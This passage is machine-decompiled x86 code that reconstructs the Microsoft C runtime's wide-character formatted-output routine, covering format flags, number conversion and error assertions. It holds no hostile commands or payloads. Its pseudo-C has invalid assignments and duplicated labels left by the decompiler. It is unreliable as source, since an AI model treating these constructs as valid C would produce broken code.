                            														__eflags = __eax;
                            														 *(__ebp - 0x10) = __eax;
                            													} else {
                            														__ecx =  *(__ebp + 0xc);
                            														__ecx =  *(__ebp + 0xc) + 2;
                            														 *(__ebp + 0xc) = __ecx;
                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
                            													}
                            													goto L64;
                            												case 3:
                            													L63:
                            													__edx =  *(__ebp - 0x10);
                            													__edx =  *(__ebp - 0x10) | 0x00000800;
                            													__eflags = __edx;
                            													 *(__ebp - 0x10) = __edx;
                            													goto L64;
                            												case 4:
                            													goto L64;
                            											}
                            										case 7:
                            											L65:
                            											__eax =  *(__ebp - 0x454) & 0x0000ffff;
                            											 *(__ebp - 0x4ec) =  *(__ebp - 0x454) & 0x0000ffff;
                            											__ecx =  *(__ebp - 0x4ec);
                            											__ecx =  *(__ebp - 0x4ec) - 0x41;
                            											 *(__ebp - 0x4ec) = __ecx;
                            											__eflags =  *(__ebp - 0x4ec) - 0x37;
                            											if( *(__ebp - 0x4ec) > 0x37) {
                            												goto L187;
                            												do {
                            													do {
                            														while(1) {
                            															L187:
                            															if( *(_t600 - 0x28) != 0) {
                            																goto L212;
                            															}
                            															goto L188;
                            														}
                            														L183:
                            														__ebp - 0x249 = __ebp - 0x249 -  *(__ebp - 4);
                            														 *(__ebp - 0x24) = __ebp - 0x249 -  *(__ebp - 4);
                            														__ecx =  *(__ebp - 4);
                            														__ecx =  *(__ebp - 4) + 1;
                            														 *(__ebp - 4) = __ecx;
                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000200;
                            														__eflags =  *(__ebp - 0x10) & 0x00000200;
                            													} while (( *(__ebp - 0x10) & 0x00000200) == 0);
                            													__eflags =  *(__ebp - 0x24);
                            													if( *(__ebp - 0x24) == 0) {
                            														break;
                            													}
                            													L185:
                            													__eax =  *(__ebp - 4);
                            													__ecx =  *( *(__ebp - 4));
                            													__eflags = __ecx - 0x30;
                            												} while (__ecx == 0x30);
                            												L186:
                            												 *(__ebp - 4) =  *(__ebp - 4) - 1;
                            												 *(__ebp - 4) =  *(__ebp - 4) - 1;
                            												__eax =  *(__ebp - 4);
                            												 *( *(__ebp - 4)) = 0x30;
                            												__ecx =  *(__ebp - 0x24);
                            												__ecx =  *(__ebp - 0x24) + 1;
                            												__eflags = __ecx;
                            												 *(__ebp - 0x24) = __ecx;
                            												while(1) {
                            													L187:
                            													if( *(_t600 - 0x28) != 0) {
                            														goto L212;
                            													}
                            													goto L188;
                            												}
                            											}
                            											L66:
                            											_t142 =  *(__ebp - 0x4ec) + 0x423f50; // 0xcccccc0d
                            											__eax =  *_t142 & 0x000000ff;
                            											switch( *((intOrPtr*)(( *_t142 & 0x000000ff) * 4 +  &M00423F14))) {
                            												case 0:
                            													L119:
                            													 *(__ebp - 0x2c) = 1;
                            													 *(__ebp - 0x454) & 0x0000ffff = ( *(__ebp - 0x454) & 0x0000ffff) + 0x20;
                            													__eflags = ( *(__ebp - 0x454) & 0x0000ffff) + 0x20;
                            													 *(__ebp - 0x454) = __ax;
                            													goto L120;
                            												case 1:
                            													L67:
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
                            													__eflags =  *(__ebp - 0x10) & 0x00000830;
                            													if(( *(__ebp - 0x10) & 0x00000830) == 0) {
                            														__edx =  *(__ebp - 0x10);
                            														__edx =  *(__ebp - 0x10) | 0x00000020;
                            														__eflags = __edx;
                            														 *(__ebp - 0x10) = __edx;
                            													}
                            													goto L69;
                            												case 2:
                            													L82:
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
                            													__eflags =  *(__ebp - 0x10) & 0x00000830;
                            													if(( *(__ebp - 0x10) & 0x00000830) == 0) {
                            														__ecx =  *(__ebp - 0x10);
                            														__ecx =  *(__ebp - 0x10) | 0x00000020;
                            														__eflags = __ecx;
                            														 *(__ebp - 0x10) = __ecx;
                            													}
                            													goto L84;
                            												case 3:
                            													L143:
                            													 *(__ebp - 0x460) = 7;
                            													goto L145;
                            												case 4:
                            													L75:
                            													__eax = __ebp + 0x14;
                            													 *(__ebp - 0x474) = E0041C290(__ebp + 0x14);
                            													__eflags =  *(__ebp - 0x474);
                            													if( *(__ebp - 0x474) == 0) {
                            														L77:
                            														__edx =  *0x60b4f0; // 0x407424
                            														 *(__ebp - 4) = __edx;
                            														__eax =  *(__ebp - 4);
                            														 *(__ebp - 0x24) = E0040DC40( *(__ebp - 4));
                            														L81:
                            														goto L187;
                            													}
                            													L76:
                            													__ecx =  *(__ebp - 0x474);
                            													__eflags =  *(__ecx + 4);
                            													if( *(__ecx + 4) != 0) {
                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
                            														__eflags =  *(__ebp - 0x10) & 0x00000800;
                            														if(( *(__ebp - 0x10) & 0x00000800) == 0) {
                            															 *(__ebp - 0xc) = 0;
                            															__edx =  *(__ebp - 0x474);
                            															__eax =  *(__edx + 4);
                            															 *(__ebp - 4) =  *(__edx + 4);
                            															__ecx =  *(__ebp - 0x474);
                            															__edx =  *__ecx;
                            															 *(__ebp - 0x24) =  *__ecx;
                            														} else {
                            															__edx =  *(__ebp - 0x474);
                            															__eax =  *(__edx + 4);
                            															 *(__ebp - 4) =  *(__edx + 4);
                            															__ecx =  *(__ebp - 0x474);
                            															__eax =  *__ecx;
                            															asm("cdq");
                            															 *__ecx - __edx =  *__ecx - __edx >> 1;
                            															 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
                            															 *(__ebp - 0xc) = 1;
                            														}
                            														goto L81;
                            													}
                            													goto L77;
                            												case 5:
                            													L120:
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            													__edx = __ebp - 0x448;
                            													 *(__ebp - 4) = __ebp - 0x448;
                            													 *(__ebp - 0x44) = 0x200;
                            													__eflags =  *(__ebp - 0x30);
                            													if( *(__ebp - 0x30) >= 0) {
                            														L122:
                            														__eflags =  *(__ebp - 0x30);
                            														if( *(__ebp - 0x30) != 0) {
                            															L125:
                            															__eflags =  *(__ebp - 0x30) - 0x200;
                            															if( *(__ebp - 0x30) > 0x200) {
                            																 *(__ebp - 0x30) = 0x200;
                            															}
                            															L127:
                            															__eflags =  *(__ebp - 0x30) - 0xa3;
                            															if( *(__ebp - 0x30) > 0xa3) {
                            																__ecx =  *(__ebp - 0x30);
                            																__ecx =  *(__ebp - 0x30) + 0x15d;
                            																 *(__ebp - 0x20) = L0040B5C0( *(__ebp - 0x30) + 0x15d,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
                            																__eflags =  *(__ebp - 0x20);
                            																if( *(__ebp - 0x20) == 0) {
                            																	 *(__ebp - 0x30) = 0xa3;
                            																} else {
                            																	__edx =  *(__ebp - 0x20);
                            																	 *(__ebp - 4) =  *(__ebp - 0x20);
                            																	 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
                            																	 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
                            																}
                            															}
                            															 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
                            															 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
                            															__edx =  *(__ebp + 0x14);
                            															__eax =  *(__edx - 8);
                            															__ecx =  *(__edx - 4);
                            															 *(__ebp - 0x490) =  *(__edx - 8);
                            															 *(__ebp - 0x48c) =  *(__edx - 4);
                            															__ecx = __ebp - 0x40;
                            															_push(E0040D3B0(__ebp - 0x40));
                            															__edx =  *(__ebp - 0x2c);
                            															_push( *(__ebp - 0x2c));
                            															__eax =  *(__ebp - 0x30);
                            															_push( *(__ebp - 0x30));
                            															__ecx =  *(__ebp - 0x454);
                            															_push( *(__ebp - 0x454));
                            															__edx =  *(__ebp - 0x44);
                            															_push( *(__ebp - 0x44));
                            															__eax =  *(__ebp - 4);
                            															_push( *(__ebp - 4));
                            															__ecx = __ebp - 0x490;
                            															_push(__ebp - 0x490);
                            															__edx =  *0x60b3cc; // 0x7e8c4bdb
                            															E00410200(__edx) =  *__eax();
                            															__esp = __esp + 0x1c;
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            															__eflags =  *(__ebp - 0x10) & 0x00000080;
                            															if(( *(__ebp - 0x10) & 0x00000080) != 0) {
                            																__eflags =  *(__ebp - 0x30);
                            																if( *(__ebp - 0x30) == 0) {
                            																	__ecx = __ebp - 0x40;
                            																	_push(E0040D3B0(__ebp - 0x40));
                            																	__ecx =  *(__ebp - 4);
                            																	_push( *(__ebp - 4));
                            																	__edx =  *0x60b3d8; // 0x7e8c4bdb
                            																	E00410200(__edx) =  *__eax();
                            																	__esp = __esp + 8;
                            																}
                            															}
                            															__eax =  *(__ebp - 0x454) & 0x0000ffff;
                            															__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x67;
                            															if(( *(__ebp - 0x454) & 0x0000ffff) == 0x67) {
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            																__eflags =  *(__ebp - 0x10) & 0x00000080;
                            																if(( *(__ebp - 0x10) & 0x00000080) == 0) {
                            																	__ecx = __ebp - 0x40;
                            																	_push(E0040D3B0(__ebp - 0x40));
                            																	__edx =  *(__ebp - 4);
                            																	_push( *(__ebp - 4));
                            																	__eax =  *0x60b3d4; // 0x7e8c4bdb
                            																	__eax =  *__eax();
                            																	__esp = __esp + 8;
                            																}
                            															}
                            															__ecx =  *(__ebp - 4);
                            															__edx =  *( *(__ebp - 4));
                            															__eflags =  *( *(__ebp - 4)) - 0x2d;
                            															if( *( *(__ebp - 4)) == 0x2d) {
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            																__ecx =  *(__ebp - 4);
                            																__ecx =  *(__ebp - 4) + 1;
                            																__eflags = __ecx;
                            																 *(__ebp - 4) = __ecx;
                            															}
                            															__edx =  *(__ebp - 4);
                            															 *(__ebp - 0x24) = E0040DC40( *(__ebp - 4));
                            															do {
                            																L187:
                            																if( *(_t600 - 0x28) != 0) {
                            																	goto L212;
                            																}
                            																goto L188;
                            															} while ( *(__ebp - 0x4ec) > 0x37);
                            															goto L66;
                            														}
                            														L123:
                            														__eax =  *(__ebp - 0x454) & 0x0000ffff;
                            														__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x67;
                            														if(( *(__ebp - 0x454) & 0x0000ffff) != 0x67) {
                            															goto L125;
                            														}
                            														L124:
                            														 *(__ebp - 0x30) = 1;
                            														goto L127;
                            													}
                            													L121:
                            													 *(__ebp - 0x30) = 6;
                            													goto L127;
                            												case 6:
                            													L69:
                            													 *(__ebp - 0xc) = 1;
                            													__ebp + 0x14 = E0041C290(__ebp + 0x14);
                            													 *(__ebp - 0x458) = __ax;
                            													__ecx =  *(__ebp - 0x10);
                            													__ecx =  *(__ebp - 0x10) & 0x00000020;
                            													__eflags = __ecx;
                            													if(__ecx == 0) {
                            														 *(__ebp - 0x448) =  *(__ebp - 0x458);
                            													} else {
                            														 *(__ebp - 0x458) & 0x0000ffff =  *(__ebp - 0x458) & 0xff;
                            														 *(__ebp - 0x470) = __dl;
                            														 *((char*)(__ebp - 0x46f)) = 0;
                            														__ecx = __ebp - 0x40;
                            														__eax = E0040D3B0(__ebp - 0x40);
                            														__ecx = __ebp - 0x40;
                            														E0040D3B0(__ebp - 0x40) =  *__eax;
                            														__ecx =  *(__ebp - 0x448 + 0xac);
                            														__edx = __ebp - 0x470;
                            														__eax = __ebp - 0x448;
                            														__eax = E00419150(__ebp - 0x448, __ebp - 0x470,  *(__ebp - 0x448 + 0xac), __ebp - 0x448);
                            														__eflags = __eax;
                            														if(__eax < 0) {
                            															 *(__ebp - 0x28) = 1;
                            														}
                            													}
                            													__edx = __ebp - 0x448;
                            													 *(__ebp - 4) = __ebp - 0x448;
                            													 *(__ebp - 0x24) = 1;
                            													while(1) {
                            														L187:
                            														if( *(_t600 - 0x28) != 0) {
                            															goto L212;
                            														}
                            														goto L188;
                            													}
                            												case 7:
                            													L140:
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            													 *(__ebp - 8) = 0xa;
                            													goto L150;
                            												case 8:
                            													goto L0;
                            												case 9:
                            													L148:
                            													 *(__ebp - 8) = 8;
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            													__eflags =  *(__ebp - 0x10) & 0x00000080;
                            													if(( *(__ebp - 0x10) & 0x00000080) != 0) {
                            														__edx =  *(__ebp - 0x10);
                            														__edx =  *(__ebp - 0x10) | 0x00000200;
                            														__eflags = __edx;
                            														 *(__ebp - 0x10) = __edx;
                            													}
                            													goto L150;
                            												case 0xa:
                            													L142:
                            													 *(__ebp - 0x30) = 8;
                            													goto L143;
                            												case 0xb:
                            													L84:
                            													__eflags =  *(__ebp - 0x30) - 0xffffffff;
                            													if( *(__ebp - 0x30) != 0xffffffff) {
                            														__edx =  *(__ebp - 0x30);
                            														 *(__ebp - 0x4f0) =  *(__ebp - 0x30);
                            													} else {
                            														 *(__ebp - 0x4f0) = 0x7fffffff;
                            													}
                            													__eax =  *(__ebp - 0x4f0);
                            													 *(__ebp - 0x47c) =  *(__ebp - 0x4f0);
                            													__ecx = __ebp + 0x14;
                            													 *(__ebp - 4) = E0041C290(__ebp + 0x14);
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
                            													__eflags =  *(__ebp - 0x10) & 0x00000020;
                            													if(( *(__ebp - 0x10) & 0x00000020) == 0) {
                            														L98:
                            														__eflags =  *(__ebp - 4);
                            														if( *(__ebp - 4) == 0) {
                            															__ecx =  *0x60b4f4; // 0x407414
                            															 *(__ebp - 4) = __ecx;
                            														}
                            														 *(__ebp - 0xc) = 1;
                            														__edx =  *(__ebp - 4);
                            														 *(__ebp - 0x480) =  *(__ebp - 4);
                            														while(1) {
                            															L101:
                            															__eax =  *(__ebp - 0x47c);
                            															__ecx =  *(__ebp - 0x47c);
                            															__ecx =  *(__ebp - 0x47c) - 1;
                            															 *(__ebp - 0x47c) = __ecx;
                            															__eflags =  *(__ebp - 0x47c);
                            															if( *(__ebp - 0x47c) == 0) {
                            																break;
                            															}
                            															L102:
                            															__edx =  *(__ebp - 0x480);
                            															__eax =  *( *(__ebp - 0x480)) & 0x0000ffff;
                            															__eflags =  *( *(__ebp - 0x480)) & 0x0000ffff;
                            															if(( *( *(__ebp - 0x480)) & 0x0000ffff) == 0) {
                            																break;
                            															}
                            															L103:
                            															 *(__ebp - 0x480) =  *(__ebp - 0x480) + 2;
                            															 *(__ebp - 0x480) =  *(__ebp - 0x480) + 2;
                            														}
                            														L104:
                            														__edx =  *(__ebp - 0x480);
                            														__edx =  *(__ebp - 0x480) -  *(__ebp - 4);
                            														__eflags = __edx;
                            														 *(__ebp - 0x24) = __edx;
                            														goto L105;
                            													} else {
                            														L88:
                            														__eflags =  *(__ebp - 4);
                            														if( *(__ebp - 4) == 0) {
                            															__eax =  *0x60b4f0; // 0x407424
                            															 *(__ebp - 4) = __eax;
                            														}
                            														__ecx =  *(__ebp - 4);
                            														 *(__ebp - 0x478) = __ecx;
                            														 *(__ebp - 0x24) = 0;
                            														while(1) {
                            															L92:
                            															__eax =  *(__ebp - 0x24);
                            															__eflags =  *(__ebp - 0x24) -  *(__ebp - 0x47c);
                            															if( *(__ebp - 0x24) >=  *(__ebp - 0x47c)) {
                            																break;
                            															}
                            															L93:
                            															__ecx =  *(__ebp - 0x478);
                            															__edx =  *__ecx;
                            															__eflags =  *__ecx;
                            															if( *__ecx == 0) {
                            																break;
                            															}
                            															L94:
                            															__ecx = __ebp - 0x40;
                            															E0040D3B0(__ebp - 0x40) =  *(__ebp - 0x478);
                            															__ecx =  *( *(__ebp - 0x478)) & 0x000000ff;
                            															__eax = E00419390( *( *(__ebp - 0x478)) & 0x000000ff,  *(__ebp - 0x478));
                            															__eflags = __eax;
                            															if(__eax != 0) {
                            																__edx =  *(__ebp - 0x478);
                            																__edx =  *(__ebp - 0x478) + 1;
                            																__eflags = __edx;
                            																 *(__ebp - 0x478) = __edx;
                            															}
                            															 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
                            															 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
                            															__edx =  *(__ebp - 0x24);
                            															__edx =  *(__ebp - 0x24) + 1;
                            															__eflags = __edx;
                            															 *(__ebp - 0x24) = __edx;
                            														}
                            														L97:
                            														L105:
                            														while(1) {
                            															L187:
                            															if( *(_t600 - 0x28) != 0) {
                            																goto L212;
                            															}
                            															goto L188;
                            														}
                            													}
                            												case 0xc:
                            													L141:
                            													 *(__ebp - 8) = 0xa;
                            													goto L150;
                            												case 0xd:
                            													L144:
                            													 *(__ebp - 0x460) = 0x27;
                            													L145:
                            													 *(__ebp - 8) = 0x10;
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            													__eflags =  *(__ebp - 0x10) & 0x00000080;
                            													if(( *(__ebp - 0x10) & 0x00000080) != 0) {
                            														__edx = 0x30;
                            														 *((short*)(__ebp - 0x14)) = __dx;
                            														 *(__ebp - 0x460) =  *(__ebp - 0x460) + 0x51;
                            														__eflags =  *(__ebp - 0x460) + 0x51;
                            														 *(__ebp - 0x12) = __ax;
                            														 *(__ebp - 0x1c) = 2;
                            													}
                            													L150:
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
                            													__eflags =  *(__ebp - 0x10) & 0x00008000;
                            													if(( *(__ebp - 0x10) & 0x00008000) == 0) {
                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
                            														__eflags =  *(__ebp - 0x10) & 0x00001000;
                            														if(( *(__ebp - 0x10) & 0x00001000) == 0) {
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
                            															__eflags =  *(__ebp - 0x10) & 0x00000020;
                            															if(( *(__ebp - 0x10) & 0x00000020) == 0) {
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            																__eflags =  *(__ebp - 0x10) & 0x00000040;
                            																if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            																	__ecx = __ebp + 0x14;
                            																	__eax = E0041C290(__ebp + 0x14);
                            																	__edx = 0;
                            																	__eflags = 0;
                            																	 *(__ebp - 0x4a0) = __eax;
                            																	 *(__ebp - 0x49c) = 0;
                            																} else {
                            																	__eax = __ebp + 0x14;
                            																	__eax = E0041C290(__ebp + 0x14);
                            																	asm("cdq");
                            																	 *(__ebp - 0x4a0) = __eax;
                            																	 *(__ebp - 0x49c) = __edx;
                            																}
                            															} else {
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            																__eflags =  *(__ebp - 0x10) & 0x00000040;
                            																if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            																	__ecx = __ebp + 0x14;
                            																	E0041C290(__ebp + 0x14) = __ax & 0x0000ffff;
                            																	asm("cdq");
                            																	 *(__ebp - 0x4a0) = __ax & 0x0000ffff;
                            																	 *(__ebp - 0x49c) = __edx;
                            																} else {
                            																	__eax = __ebp + 0x14;
                            																	__eax = E0041C290(__ebp + 0x14);
                            																	__ax = __eax;
                            																	asm("cdq");
                            																	 *(__ebp - 0x4a0) = __eax;
                            																	 *(__ebp - 0x49c) = __edx;
                            																}
                            															}
                            														} else {
                            															__eax = __ebp + 0x14;
                            															 *(__ebp - 0x4a0) = E0041C2B0(__ebp + 0x14);
                            															 *(__ebp - 0x49c) = __edx;
                            														}
                            													} else {
                            														__ecx = __ebp + 0x14;
                            														 *(__ebp - 0x4a0) = E0041C2B0(__ebp + 0x14);
                            														 *(__ebp - 0x49c) = __edx;
                            													}
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            													__eflags =  *(__ebp - 0x10) & 0x00000040;
                            													if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            														L167:
                            														__ecx =  *(__ebp - 0x4a0);
                            														 *(__ebp - 0x4a8) =  *(__ebp - 0x4a0);
                            														__edx =  *(__ebp - 0x49c);
                            														 *(__ebp - 0x4a4) =  *(__ebp - 0x49c);
                            														goto L168;
                            													} else {
                            														L163:
                            														__eflags =  *(__ebp - 0x49c);
                            														if(__eflags > 0) {
                            															goto L167;
                            														}
                            														L164:
                            														if(__eflags < 0) {
                            															L166:
                            															 *(__ebp - 0x4a0) =  ~( *(__ebp - 0x4a0));
                            															__edx =  *(__ebp - 0x49c);
                            															asm("adc edx, 0x0");
                            															__edx =  ~( *(__ebp - 0x49c));
                            															 *(__ebp - 0x4a8) =  ~( *(__ebp - 0x4a0));
                            															 *(__ebp - 0x4a4) =  ~( *(__ebp - 0x49c));
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            															L168:
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
                            															__eflags =  *(__ebp - 0x10) & 0x00008000;
                            															if(( *(__ebp - 0x10) & 0x00008000) == 0) {
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
                            																__eflags =  *(__ebp - 0x10) & 0x00001000;
                            																if(( *(__ebp - 0x10) & 0x00001000) == 0) {
                            																	__edx =  *(__ebp - 0x4a8);
                            																	__eax =  *(__ebp - 0x4a4);
                            																	__eax =  *(__ebp - 0x4a4) & 0x00000000;
                            																	__eflags = __eax;
                            																	 *(__ebp - 0x4a4) = __eax;
                            																}
                            															}
                            															__eflags =  *(__ebp - 0x30);
                            															if( *(__ebp - 0x30) >= 0) {
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
                            																__eflags =  *(__ebp - 0x30) - 0x200;
                            																if( *(__ebp - 0x30) > 0x200) {
                            																	 *(__ebp - 0x30) = 0x200;
                            																}
                            															} else {
                            																 *(__ebp - 0x30) = 1;
                            															}
                            															 *(__ebp - 0x4a8) =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
                            															__eflags =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
                            															if(( *(__ebp - 0x4a8) |  *(__ebp - 0x4a4)) == 0) {
                            																 *(__ebp - 0x1c) = 0;
                            															}
                            															__eax = __ebp - 0x249;
                            															 *(__ebp - 4) = __ebp - 0x249;
                            															while(1) {
                            																L178:
                            																__ecx =  *(__ebp - 0x30);
                            																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                            																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                            																__eflags =  *(__ebp - 0x30);
                            																if( *(__ebp - 0x30) > 0) {
                            																	goto L180;
                            																}
                            																L179:
                            																 *(__ebp - 0x4a8) =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
                            																__eflags =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
                            																if(( *(__ebp - 0x4a8) |  *(__ebp - 0x4a4)) == 0) {
                            																	goto L183;
                            																}
                            																L180:
                            																__eax =  *(__ebp - 8);
                            																asm("cdq");
                            																__ecx =  *(__ebp - 0x4a4);
                            																__edx =  *(__ebp - 0x4a8);
                            																__eax = E0041CE40( *(__ebp - 0x4a8),  *(__ebp - 0x4a4),  *(__ebp - 8),  *(__ebp - 0x4a8));
                            																 *(__ebp - 0x494) = __eax;
                            																__eax =  *(__ebp - 8);
                            																asm("cdq");
                            																__eax =  *(__ebp - 0x4a4);
                            																__ecx =  *(__ebp - 0x4a8);
                            																 *(__ebp - 0x4a8) = E0041CDD0( *(__ebp - 0x4a8),  *(__ebp - 0x4a4),  *(__ebp - 8), __edx);
                            																 *(__ebp - 0x4a4) = __edx;
                            																__eflags =  *(__ebp - 0x494) - 0x39;
                            																if( *(__ebp - 0x494) > 0x39) {
                            																	__edx =  *(__ebp - 0x494);
                            																	__edx =  *(__ebp - 0x494) +  *(__ebp - 0x460);
                            																	__eflags = __edx;
                            																	 *(__ebp - 0x494) = __edx;
                            																}
                            																__eax =  *(__ebp - 4);
                            																 *( *(__ebp - 4)) =  *(__ebp - 0x494);
                            																 *(__ebp - 4) =  *(__ebp - 4) - 1;
                            																 *(__ebp - 4) =  *(__ebp - 4) - 1;
                            																L178:
                            																__ecx =  *(__ebp - 0x30);
                            																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                            																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                            																__eflags =  *(__ebp - 0x30);
                            																if( *(__ebp - 0x30) > 0) {
                            																	goto L180;
                            																}
                            																goto L179;
                            															}
                            														}
                            														L165:
                            														__eflags =  *(__ebp - 0x4a0);
                            														if( *(__ebp - 0x4a0) >= 0) {
                            															goto L167;
                            														}
                            														goto L166;
                            													}
                            												case 0xe:
                            													while(1) {
                            														L187:
                            														if( *(_t600 - 0x28) != 0) {
                            															goto L212;
                            														}
                            														goto L188;
                            													}
                            											}
                            										case 8:
                            											L24:
                            											__ecx =  *(__ebp - 0x10);
                            											__ecx =  *(__ebp - 0x10) | 0x00000002;
                            											 *(__ebp - 0x10) = __ecx;
                            											goto L27;
                            										case 9:
                            											L25:
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
                            											goto L27;
                            										case 0xa:
                            											L23:
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000001;
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000001;
                            											goto L27;
                            										case 0xb:
                            											L22:
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
                            											goto L27;
                            										case 0xc:
                            											L26:
                            											__eax =  *(__ebp - 0x10);
                            											__eax =  *(__ebp - 0x10) | 0x00000008;
                            											__eflags = __eax;
                            											 *(__ebp - 0x10) = __eax;
                            											goto L27;
                            										case 0xd:
                            											L27:
                            											goto L214;
                            									}
                            								} else {
                            									_t574 = 0;
                            									if(0 == 0) {
                            										 *(_t600 - 0x4dc) = 0;
                            									} else {
                            										 *(_t600 - 0x4dc) = 1;
                            									}
                            									 *(_t600 - 0x46c) =  *(_t600 - 0x4dc);
                            									if( *(_t600 - 0x46c) == 0) {
                            										_push(L"(\"Incorrect format specifier\", 0)");
                            										_push(0);
                            										_push(0x460);
                            										_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            										_push(2);
                            										_t501 = L0040E1A0();
                            										_t603 = _t603 + 0x14;
                            										if(_t501 == 1) {
                            											asm("int3");
                            										}
                            									}
                            									L14:
                            									if( *(_t600 - 0x46c) != 0) {
                            										goto L16;
                            									} else {
                            										 *((intOrPtr*)(L0040EC70(_t546))) = 0x16;
                            										E00411A50(_t534, _t546, _t598, _t599, L"(\"Incorrect format specifier\", 0)", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x460, 0);
                            										 *(_t600 - 0x4c8) = 0xffffffff;
                            										E0040D380(_t600 - 0x40);
                            										_t486 =  *(_t600 - 0x4c8);
                            										goto L225;
                            									}
                            								}
                            							}
                            							L215:
                            							if( *(_t600 - 0x45c) == 0) {
                            								L218:
                            								 *(_t600 - 0x4f8) = 1;
                            								L219:
                            								_t574 =  *(_t600 - 0x4f8);
                            								 *(_t600 - 0x4bc) =  *(_t600 - 0x4f8);
                            								if( *(_t600 - 0x4bc) == 0) {
                            									_push(L"((state == ST_NORMAL) || (state == ST_TYPE))");
                            									_push(0);
                            									_push(0x8f5);
                            									_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            									_push(2);
                            									_t491 = L0040E1A0();
                            									_t603 = _t603 + 0x14;
                            									if(_t491 == 1) {
                            										asm("int3");
                            									}
                            								}
                            								if( *(_t600 - 0x4bc) != 0) {
                            									 *(_t600 - 0x4d4) =  *(_t600 - 0x44c);
                            									E0040D380(_t600 - 0x40);
                            									_t486 =  *(_t600 - 0x4d4);
                            								} else {
                            									 *((intOrPtr*)(L0040EC70(_t538))) = 0x16;
                            									E00411A50(_t534, _t538, _t598, _t599, L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x8f5, 0);
                            									 *(_t600 - 0x4d0) = 0xffffffff;
                            									E0040D380(_t600 - 0x40);
                            									_t486 =  *(_t600 - 0x4d0);
                            								}
                            								goto L225;
                            							}
                            							L216:
                            							if( *(_t600 - 0x45c) == 7) {
                            								goto L218;
                            							}
                            							L217:
                            							 *(_t600 - 0x4f8) = 0;
                            							goto L219;
                            						}
                            					} else {
                            						L113:
                            						 *((intOrPtr*)(L0040EC70(__ecx))) = 0x16;
                            						__eax = E00411A50(__ebx, __ecx, __edi, __esi, L"(\"\'n\' format specifier disabled\", 0)", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x695, 0);
                            						 *(__ebp - 0x4cc) = 0xffffffff;
                            						__ecx = __ebp - 0x40;
                            						__eax = E0040D380(__ecx);
                            						__eax =  *(__ebp - 0x4cc);
                            						L225:
                            						return E00416CA0(_t486, _t534,  *(_t600 - 0x48) ^ _t600, _t574, _t598, _t599);
                            					}
                            					L115:
